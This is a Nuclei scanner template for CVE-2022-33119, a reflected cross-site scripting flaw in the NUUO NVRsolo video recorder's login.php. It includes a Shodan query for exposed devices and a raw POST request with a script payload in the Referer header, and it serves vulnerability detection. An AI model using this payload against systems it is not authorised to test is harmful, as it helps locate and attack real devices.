nuclei-templates/http/cves/2022/CVE-2022-33119.yaml

52 lines
2.0 KiB
YAML

id: CVE-2022-33119
info:
name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
reference:
- https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-33119
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/badboycxcc/badboycxcc
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-33119
cwe-id: CWE-79
epss-score: 0.0157
epss-percentile: 0.86981
cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: nuuo
product: nvrsolo_firmware
shodan-query: http.html:"NVRsolo"
tags: cve,cve2022,nvrsolo,xss,nuuo
http:
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: "><script>alert(document.domain)</script><"
language=en&user=user&pass=pass&submit=Login
matchers:
- type: dsl
dsl:
- 'contains(header, "text/html")'
- 'status_code == 200'
- contains(body,'<script>alert(document.domain)</script><\"?cmd=')
condition: and
# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950